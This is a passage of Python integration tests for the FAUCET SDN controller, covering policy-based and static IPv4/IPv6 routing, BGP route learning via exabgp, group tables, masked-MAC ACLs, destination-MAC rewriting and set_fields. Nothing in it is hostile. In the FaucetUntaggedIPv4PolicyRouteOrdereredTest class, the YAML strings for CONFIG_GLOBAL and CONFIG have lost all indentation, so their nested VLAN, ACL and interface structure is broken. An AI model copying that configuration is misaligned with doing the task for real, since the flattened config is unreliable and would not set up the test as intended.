        second_host.setIP(str(second_host_ip.ip), prefixLen=24)
        third_host.setIP(str(third_host_ip.ip), prefixLen=24)
        self.host_ipv4_alias(second_host, remote_ip)
        self.host_ipv4_alias(third_host, remote_ip2)
        self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
        self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
        self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
        # ensure all nexthops resolved.
        self.one_ipv4_ping(first_host, first_faucet_vip.ip)
        self.one_ipv4_ping(second_host, second_faucet_vip.ip)
        self.one_ipv4_ping(third_host, third_faucet_vip.ip)
        self.wait_for_route_as_flow(
            second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
        self.wait_for_route_as_flow(
            third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
        # verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
        self.one_ipv4_ping(first_host, remote_ip.ip)
        self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedIPv4PolicyRouteOrdereredTest(FaucetUntaggedTest):
    """Same as FaucetUntaggedIPv4PolicyRouteTest but with ordered (list) ACL actions.

    NOTE(review): class name spelling 'Orderered' kept as-is — renaming would
    change the public interface.
    """

    CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
- swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
- swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""

    CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""

    def test_untagged(self):
        # 10.99.0.1 is on b2, and 10.99.0.2 is on b3
        # we want to route 10.99.0.0/24 to b2, but we want
        # want to PBR 10.99.0.2/32 to b3.
        first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
        first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
        second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
        second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
        third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
        third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
        first_host, second_host, third_host = self.hosts_name_ordered()[:3]
        remote_ip = ipaddress.ip_interface('10.99.0.1/24')
        remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
        second_host.setIP(str(second_host_ip.ip), prefixLen=24)
        third_host.setIP(str(third_host_ip.ip), prefixLen=24)
        self.host_ipv4_alias(second_host, remote_ip)
        self.host_ipv4_alias(third_host, remote_ip2)
        self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
        self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
        self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
        # ensure all nexthops resolved.
        self.one_ipv4_ping(first_host, first_faucet_vip.ip)
        self.one_ipv4_ping(second_host, second_faucet_vip.ip)
        self.one_ipv4_ping(third_host, third_faucet_vip.ip)
        self.wait_for_route_as_flow(
            second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
        self.wait_for_route_as_flow(
            third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
        # verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
        self.one_ipv4_ping(first_host, remote_ip.ip)
        self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedMixedIPv4RouteTest(FaucetUntaggedTest):
    """Routing between two IPv4 subnets on one VLAN with two FAUCET VIPs."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["172.16.0.254/24", "10.0.0.254/24"]
"""

    CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED

    def test_untagged(self):
        """Each host pings its own VIP, then the other subnet via routes."""
        host_pair = self.hosts_name_ordered()[:2]
        first_host, second_host = host_pair
        first_host_net = ipaddress.ip_interface('10.0.0.1/24')
        second_host_net = ipaddress.ip_interface('172.16.0.1/24')
        second_host.setIP(str(second_host_net.ip), prefixLen=24)
        self.one_ipv4_ping(first_host, self.FAUCET_VIPV4.ip)
        self.one_ipv4_ping(second_host, self.FAUCET_VIPV4_2.ip)
        self.add_host_route(
            first_host, second_host_net, self.FAUCET_VIPV4.ip)
        self.add_host_route(
            second_host, first_host_net, self.FAUCET_VIPV4_2.ip)
        self.one_ipv4_ping(first_host, second_host_net.ip)
        self.one_ipv4_ping(second_host, first_host_net.ip)
class FaucetUntaggedMixedIPv6RouteTest(FaucetUntaggedTest):
    """Routing between two IPv6 subnets on one VLAN with two FAUCET VIPs."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112", "fc01::1:254/112"]
"""

    CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED

    def test_untagged(self):
        """Each host pings its own VIP, then the other subnet via routes."""
        host_pair = self.hosts_name_ordered()[:2]
        first_host, second_host = host_pair
        first_host_net = ipaddress.ip_interface('fc00::1:1/64')
        second_host_net = ipaddress.ip_interface('fc01::1:1/64')
        self.add_host_ipv6_address(first_host, first_host_net)
        self.one_ipv6_ping(first_host, self.FAUCET_VIPV6.ip)
        self.add_host_ipv6_address(second_host, second_host_net)
        self.one_ipv6_ping(second_host, self.FAUCET_VIPV6_2.ip)
        self.add_host_route(
            first_host, second_host_net, self.FAUCET_VIPV6.ip)
        self.add_host_route(
            second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
        self.one_ipv6_ping(first_host, second_host_net.ip)
        self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedBGPIPv6DefaultRouteTest(FaucetUntaggedTest):
    """Verify FAUCET can learn an IPv6 default route from an exabgp BGP peer."""

    # BGP tests assume a single controller (one BGP speaker instance).
    NUM_FAUCET_CONTROLLERS = 1

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["fc00::1:254/112"]
routers:
    router1:
        bgp:
            as: 1
            connect_mode: "passive"
            port: %(bgp_port)d
            routerid: "1.1.1.1"
            server_addresses: ["::1"]
            neighbor_addresses: ["::1"]
            vlan: 100
""" + """
            neighbor_as: %u
""" % PEER_BGP_AS

    CONFIG = """
        nd_neighbor_timeout: 2
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED

    # The peer advertises only a default route, via the first host.
    exabgp_peer_conf = """
    static {
      route ::/0 next-hop fc00::1:1 local-preference 100;
    }
"""
    exabgp_log = None
    exabgp_err = None
    # bgp_port is allocated by the test framework at runtime.
    config_ports = {'bgp_port': None}

    def post_start_net(self):
        # Start the exabgp peer only once the network (and bgp_port) is up.
        exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
        self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)

    def test_untagged(self):
        self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
        first_host, second_host = self.hosts_name_ordered()[:2]
        self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
        self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
        # An alias on the first host, reachable only via the BGP default route.
        first_host_alias_ip = ipaddress.ip_interface('fc00::50:1/112')
        first_host_alias_host_ip = ipaddress.ip_interface(
            ipaddress.ip_network(first_host_alias_ip.ip))
        self.add_host_ipv6_address(first_host, first_host_alias_ip)
        self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
        # FAUCET must report at least one route learned from the neighbor.
        self.assertGreater(
            self.scrape_prometheus_var(
                'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
            0)
        self.wait_exabgp_sent_updates(self.exabgp_log)
        self.add_host_route(
            second_host, first_host_alias_host_ip, self.FAUCET_VIPV6.ip)
        self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
        self.one_ipv6_controller_ping(first_host)
        # A config cold start must not break the learned BGP routing state.
        self.coldstart_conf()
class FaucetUntaggedBGPIPv6RouteTest(FaucetUntaggedTest):
    """Verify an IPv6 routing mesh built from routes learned over BGP,
    including rejection of invalid advertised routes."""

    # BGP tests assume a single controller (one BGP speaker instance).
    NUM_FAUCET_CONTROLLERS = 1

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["fc00::1:254/112"]
routers:
    router1:
        bgp:
            as: 1
            connect_mode: "passive"
            port: %(bgp_port)d
            routerid: "1.1.1.1"
            server_addresses: ["::1"]
            neighbor_addresses: ["::1"]
            vlan: 100
""" + """
            neighbor_as: %u
""" % PEER_BGP_AS

    CONFIG = """
        nd_neighbor_timeout: 2
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED

    # The fc00::40:0 route's next hop is FAUCET's own VIP and must be
    # rejected ("cannot be us"); fc00::50:0's next hop is outside the
    # VLAN's connected subnet.
    exabgp_peer_conf = """
    static {
      route fc00::10:0/112 next-hop fc00::1:1 local-preference 100;
      route fc00::20:0/112 next-hop fc00::1:2 local-preference 100;
      route fc00::30:0/112 next-hop fc00::1:2 local-preference 100;
      route fc00::40:0/112 next-hop fc00::1:254;
      route fc00::50:0/112 next-hop fc00::2:2;
    }
"""
    exabgp_log = None
    exabgp_err = None
    # bgp_port is allocated by the test framework at runtime.
    config_ports = {'bgp_port': None}

    def post_start_net(self):
        # Start the exabgp peer only once the network (and bgp_port) is up.
        exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
        self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)

    def test_untagged(self):
        self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
        first_host, second_host = self.hosts_name_ordered()[:2]
        self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
        self.assertGreater(
            self.scrape_prometheus_var(
                'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
            0)
        self.wait_exabgp_sent_updates(self.exabgp_log)
        # The route whose next hop is FAUCET's own VIP must be rejected.
        self.verify_invalid_bgp_route(r'.+fc00::40:0\/112.+cannot be us$')
        self.verify_ipv6_routing_mesh()
        # Routing must recover after all ports are flapped.
        self.flap_all_switch_ports()
        self.verify_ipv6_routing_mesh()
        for host in first_host, second_host:
            self.one_ipv6_controller_ping(host)
        self.verify_traveling_dhcp_mac()
class FaucetUntaggedSameVlanIPv6RouteTest(FaucetUntaggedTest):
    """Verify static IPv6 routing between two subnets on the same VLAN."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["fc00::10:1/112", "fc00::20:1/112"]
        routes:
            - route:
                ip_dst: "fc00::10:0/112"
                ip_gw: "fc00::10:2"
            - route:
                ip_dst: "fc00::20:0/112"
                ip_gw: "fc00::20:2"
"""

    CONFIG = """
        nd_neighbor_timeout: 2
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED

    def test_untagged(self):
        host_a, host_b = self.hosts_name_ordered()[:2]
        host_a_ip = ipaddress.ip_interface('fc00::10:2/112')
        host_a_gw = ipaddress.ip_address('fc00::10:1')
        host_b_ip = ipaddress.ip_interface('fc00::20:2/112')
        host_b_gw = ipaddress.ip_address('fc00::20:1')
        self.add_host_ipv6_address(host_a, host_a_ip)
        self.add_host_ipv6_address(host_b, host_b_ip)
        # Each host routes the other's subnet via its own FAUCET VIP.
        self.add_host_route(host_a, host_b_ip, host_a_gw)
        self.add_host_route(host_b, host_a_ip, host_b_gw)
        # Wait for FAUCET to install both routes as flows before pinging.
        self.wait_for_route_as_flow(host_a.MAC(), host_a_ip.network)
        self.wait_for_route_as_flow(host_b.MAC(), host_b_ip.network)
        # Cross-subnet and VIP reachability in both directions.
        self.one_ipv6_ping(host_a, host_b_ip.ip)
        self.one_ipv6_ping(host_a, host_b_gw)
        self.one_ipv6_ping(host_b, host_a_ip.ip)
        self.one_ipv6_ping(host_b, host_a_gw)
class FaucetUntaggedIPv6RouteTest(FaucetUntaggedTest):
    """Verify static IPv6 routes work and are exported to a BGP peer."""

    # BGP tests assume a single controller (one BGP speaker instance).
    NUM_FAUCET_CONTROLLERS = 1

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["fc00::1:254/112"]
        routes:
            - route:
                ip_dst: "fc00::10:0/112"
                ip_gw: "fc00::1:1"
            - route:
                ip_dst: "fc00::20:0/112"
                ip_gw: "fc00::1:2"
            - route:
                ip_dst: "fc00::30:0/112"
                ip_gw: "fc00::1:2"
routers:
    router1:
        bgp:
            as: 1
            connect_mode: "passive"
            port: %(bgp_port)d
            routerid: "1.1.1.1"
            server_addresses: ["::1"]
            neighbor_addresses: ["::1"]
            vlan: 100
""" + """
            neighbor_as: %u
""" % PEER_BGP_AS

    CONFIG = """
        nd_neighbor_timeout: 2
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED

    exabgp_log = None
    exabgp_err = None
    # bgp_port is allocated by the test framework at runtime.
    config_ports = {'bgp_port': None}

    def post_start_net(self):
        # The exabgp peer advertises nothing here; it only receives
        # FAUCET's exported routes.
        exabgp_conf = self.get_exabgp_conf('::1')
        self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)

    def test_untagged(self):
        self.verify_ipv6_routing_mesh()
        second_host = self.hosts_name_ordered()[1]
        self.flap_all_switch_ports()
        # Routes must be reinstalled as flows after the port flap.
        self.wait_for_route_as_flow(
            second_host.MAC(), ipaddress.IPv6Network('fc00::30:0/112'))
        self.verify_ipv6_routing_mesh()
        self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
        self.assertGreater(
            self.scrape_prometheus_var(
                'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}, default=0),
            0)
        # FAUCET must have advertised the connected VIP subnet plus all
        # three static routes to the peer.
        updates = self.exabgp_updates(self.exabgp_log)
        for route_string in (
                'fc00::1:0/112 next-hop fc00::1:254',
                'fc00::10:0/112 next-hop fc00::1:1',
                'fc00::20:0/112 next-hop fc00::1:2',
                'fc00::30:0/112 next-hop fc00::1:2'):
            self.assertTrue(re.search(route_string, updates), msg=updates)
class FaucetUntaggedRestBcastIPv6RouteTest(FaucetUntaggedIPv6RouteTest):
    """As FaucetUntaggedIPv6RouteTest, but with restricted_bcast_arpnd
    enabled on every port; inherits the parent's test methods."""

    CONFIG = """
        nd_neighbor_timeout: 2
        max_resolve_backoff_time: 1
        interfaces:
            %(port_1)d:
                native_vlan: 100
                restricted_bcast_arpnd: true
            %(port_2)d:
                native_vlan: 100
                restricted_bcast_arpnd: true
            %(port_3)d:
                native_vlan: 100
                restricted_bcast_arpnd: true
            %(port_4)d:
                native_vlan: 100
                restricted_bcast_arpnd: true
"""
class FaucetTaggedIPv6RouteTest(FaucetTaggedTest):
    """Test basic IPv6 routing without BGP."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "tagged"
        faucet_vips: ["fc00::1:254/112"]
        routes:
            - route:
                ip_dst: "fc00::10:0/112"
                ip_gw: "fc00::1:1"
            - route:
                ip_dst: "fc00::20:0/112"
                ip_gw: "fc00::1:2"
"""

    CONFIG = """
        nd_neighbor_timeout: 2
        max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER

    def test_tagged(self):
        """Test IPv6 routing works."""
        host_pair = self.hosts_name_ordered()[:2]
        first_host, second_host = host_pair
        first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
        second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
        first_host_routed_ip = ipaddress.ip_interface('fc00::10:1/112')
        second_host_routed_ip = ipaddress.ip_interface('fc00::20:1/112')
        # Routing must survive repeated MAC swaps and a config cold start.
        for _coldstart in range(2):
            for _swaps in range(5):
                self.verify_ipv6_routing_pair(
                    first_host, first_host_ip, first_host_routed_ip,
                    second_host, second_host_ip, second_host_routed_ip)
                self.swap_host_macs(first_host, second_host)
            self.coldstart_conf()
class FaucetGroupTableTest(FaucetUntaggedTest):
    """Verify flooding uses a group entry when group_table is enabled."""

    CONFIG = """
        group_table: True
""" + CONFIG_BOILER_UNTAGGED

    def test_group_exist(self):
        # The broadcast flood flow for VLAN 100 must point at group ID 100.
        flood_match = {'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'}
        group_id = self.get_group_id_for_matching_flow(
            flood_match, table_id=self._FLOOD_TABLE)
        self.assertEqual(100, group_id)
class FaucetTaggedGroupTableTest(FaucetTaggedTest):
    """Verify flooding uses a group entry when group_table is enabled (tagged)."""

    CONFIG = """
        group_table: True
""" + CONFIG_TAGGED_BOILER

    def test_group_exist(self):
        # The broadcast flood flow for VLAN 100 must point at group ID 100.
        flood_match = {'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'}
        group_id = self.get_group_id_for_matching_flow(
            flood_match, table_id=self._FLOOD_TABLE)
        self.assertEqual(100, group_id)
class FaucetEthSrcMaskTest(FaucetUntaggedTest):
    """Verify ACL matching on a masked Ethernet source address."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            eth_src: 0e:0d:00:00:00:00/ff:ff:00:00:00:00
            actions:
                allow: 1
        - rule:
            actions:
                allow: 0
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        host_a, host_b = self.hosts_name_ordered()[0:2]
        # This MAC matches the allow rule only in the masked first two octets.
        host_a.setMAC('0e:0d:00:00:00:99')
        self.retry_net_ping(hosts=(host_a, host_b))
        # The masked-source ACL rule must have matched the ping traffic.
        self.wait_nonzero_packet_count_flow(
            {'dl_src': '0e:0d:00:00:00:00/ff:ff:00:00:00:00'},
            table_id=self._PORT_ACL_TABLE)
class FaucetDestRewriteTest(FaucetUntaggedTest):
    """Verify an ACL can rewrite the destination MAC of matching packets."""

    def override_mac():  # pylint: disable=no-method-argument,no-self-use
        # MAC the ACL matches on (the "fake" destination).
        return '0e:00:00:00:00:02'

    OVERRIDE_MAC = override_mac()

    def rewrite_mac():  # pylint: disable=no-method-argument,no-self-use
        # MAC the ACL writes into eth_dst.
        return '0e:00:00:00:00:03'

    REWRITE_MAC = rewrite_mac()

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_dst: "%s"
            actions:
                allow: 1
                output:
                    set_fields:
                        - eth_dst: "%s"
        - rule:
            actions:
                allow: 1
""" % (override_mac(), rewrite_mac())

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the rewritten mac address.
        tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
            timeout=5, packets=1)
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))

    def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
        """Ping OVERRIDE_MAC from source_host; verify the frame is rewritten
        to REWRITE_MAC and delivered only to rewrite_host's port."""
        overridden_host.setMAC(self.OVERRIDE_MAC)
        rewrite_host.setMAC(self.REWRITE_MAC)
        rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
        rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
        # Wait until the rewrite MAC has been learned on port 3.
        self.wait_until_matching_flow(
            {'dl_dst': self.REWRITE_MAC},
            table_id=self._ETH_DST_TABLE,
            actions=['OUTPUT:%u' % self.port_map['port_3']])
        tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
            source_host.MAC(), rewrite_host.MAC()))
        tcpdump_txt = self.tcpdump_helper(
            tcpdump_host, tcpdump_filter, [
                lambda: source_host.cmd(
                    'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
                # this will fail if no reply
                lambda: self.one_ipv4_ping(
                    source_host, rewrite_host.IP(), require_host_learned=False)],
            timeout=3, packets=1)
        # ping from h1 to h2.mac should appear in third host, and not second host, as
        # the acl should rewrite the dst mac.
        self.assertFalse(re.search(
            '%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))

    def test_switching(self):
        """Tests that a acl can rewrite the destination mac address,
           and the packet will only go out the port of the new mac.
           (Continues through faucet pipeline)
        """
        source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
        self.verify_dest_rewrite(
            source_host, overridden_host, rewrite_host, overridden_host)
class FaucetDestRewriteOrderedTest(FaucetUntaggedTest):
    """As FaucetDestRewriteTest, but using the ordered (list) ACL output
    action syntax."""

    def override_mac():  # pylint: disable=no-method-argument,no-self-use
        # MAC the ACL matches on (the "fake" destination).
        return '0e:00:00:00:00:02'

    OVERRIDE_MAC = override_mac()

    def rewrite_mac():  # pylint: disable=no-method-argument,no-self-use
        # MAC the ACL writes into eth_dst.
        return '0e:00:00:00:00:03'

    REWRITE_MAC = rewrite_mac()

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_dst: "%s"
            actions:
                allow: 1
                output:
                    - set_fields:
                        - eth_dst: "%s"
        - rule:
            actions:
                allow: 1
""" % (override_mac(), rewrite_mac())

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the rewritten mac address.
        tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
            timeout=5, packets=1)
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))

    def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
        """Ping OVERRIDE_MAC from source_host; verify the frame is rewritten
        to REWRITE_MAC and delivered only to rewrite_host's port."""
        overridden_host.setMAC(self.OVERRIDE_MAC)
        rewrite_host.setMAC(self.REWRITE_MAC)
        rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
        rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
        # Wait until the rewrite MAC has been learned on port 3.
        self.wait_until_matching_flow(
            {'dl_dst': self.REWRITE_MAC},
            table_id=self._ETH_DST_TABLE,
            actions=['OUTPUT:%u' % self.port_map['port_3']])
        tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
            source_host.MAC(), rewrite_host.MAC()))
        tcpdump_txt = self.tcpdump_helper(
            tcpdump_host, tcpdump_filter, [
                lambda: source_host.cmd(
                    'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
                # this will fail if no reply
                lambda: self.one_ipv4_ping(
                    source_host, rewrite_host.IP(), require_host_learned=False)],
            timeout=3, packets=1)
        # ping from h1 to h2.mac should appear in third host, and not second host, as
        # the acl should rewrite the dst mac.
        self.assertFalse(re.search(
            '%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))

    def test_switching(self):
        """Tests that a acl can rewrite the destination mac address,
           and the packet will only go out the port of the new mac.
           (Continues through faucet pipeline)
        """
        source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
        self.verify_dest_rewrite(
            source_host, overridden_host, rewrite_host, overridden_host)
class FaucetSetFieldsTest(FaucetUntaggedTest):
    # A generic test to verify that a flow will set fields specified for
    # matching packets
    OUTPUT_MAC = '0f:00:12:23:48:03'
    SRC_MAC = '0f:12:00:00:00:ff'
    IP_DSCP_VAL = 46
    # this is the converted DSCP value that is displayed
    NW_TOS_VAL = 184
    IPV4_SRC_VAL = "192.0.2.0"
    IPV4_DST_VAL = "198.51.100.0"
    # ICMP echo request
    ICMPV4_TYPE_VAL = 8
    UDP_SRC_PORT = 68
    UDP_DST_PORT = 67

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            eth_type: 0x0800
            actions:
                allow: 1
                output:
                    set_fields:
                        - ipv4_src: '%s'
                        - ipv4_dst: '%s'
                        - ip_dscp: %d
        - rule:
            eth_type: 0x0800
            ip_proto: 1
            actions:
                allow: 1
                output:
                    set_fields:
                        - icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_set_fields_generic_udp(self):
        # Send a basic UDP packet through the faucet pipeline and verify that
        # the expected fields were updated via tcpdump output
        source_host, dest_host = self.hosts_name_ordered()[0:2]
        dest_host.setMAC(self.OUTPUT_MAC)
        # scapy command to create and send a UDP packet
        scapy_pkt = self.scapy_base_udp(
            self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
            dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
            dst=self.OUTPUT_MAC)
        tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
        tcpdump_txt = self.tcpdump_helper(
            dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
            root_intf=True, packets=1)
        # verify that the packet we've received on the dest_host has the
        # overwritten values
        self.assertTrue(
            re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
                                         self.IPV4_DST_VAL, self.UDP_DST_PORT),
                      tcpdump_txt))
        # check the packet's converted dscp value
        self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))

    def test_set_fields_icmp(self):
        # Send a basic ICMP packet through the faucet pipeline and verify that
        # the expected fields were updated via tcpdump output
        source_host, dest_host = self.hosts_name_ordered()[0:2]
        dest_host.setMAC(self.OUTPUT_MAC)
        # scapy command to create and send an ICMP packet
        scapy_pkt = self.scapy_icmp(
            self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
            dest_host.IP(), dst=self.OUTPUT_MAC)
        tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
        tcpdump_txt = self.tcpdump_helper(
            dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
            root_intf=True, packets=1)
        # verify that the packet we've received on the dest_host has been
        # overwritten to be an ICMP echo request
        self.assertTrue(re.search("ICMP echo request", tcpdump_txt))

    def test_untagged(self):
        # Inherited ping test is not relevant when the ACL rewrites headers.
        pass
class FaucetOrderedSetFieldsTest(FaucetUntaggedTest):
    # A generic test to verify that a flow will set fields specified for
    # matching packets (ordered/list ACL output action syntax)
    OUTPUT_MAC = '0f:00:12:23:48:03'
    SRC_MAC = '0f:12:00:00:00:ff'
    IP_DSCP_VAL = 46
    # this is the converted DSCP value that is displayed
    NW_TOS_VAL = 184
    IPV4_SRC_VAL = "192.0.2.0"
    IPV4_DST_VAL = "198.51.100.0"
    # ICMP echo request
    ICMPV4_TYPE_VAL = 8
    UDP_SRC_PORT = 68
    UDP_DST_PORT = 67

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            eth_type: 0x0800
            actions:
                allow: 1
                output:
                    - set_fields:
                        - ipv4_src: '%s'
                        - ipv4_dst: '%s'
                        - ip_dscp: %d
        - rule:
            eth_type: 0x0800
            ip_proto: 1
            actions:
                allow: 1
                output:
                    - set_fields:
                        - icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_set_fields_generic_udp(self):
        # Send a basic UDP packet through the faucet pipeline and verify that
        # the expected fields were updated via tcpdump output
        source_host, dest_host = self.hosts_name_ordered()[0:2]
        dest_host.setMAC(self.OUTPUT_MAC)
        # scapy command to create and send a UDP packet
        scapy_pkt = self.scapy_base_udp(
            self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
            dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
            dst=self.OUTPUT_MAC)
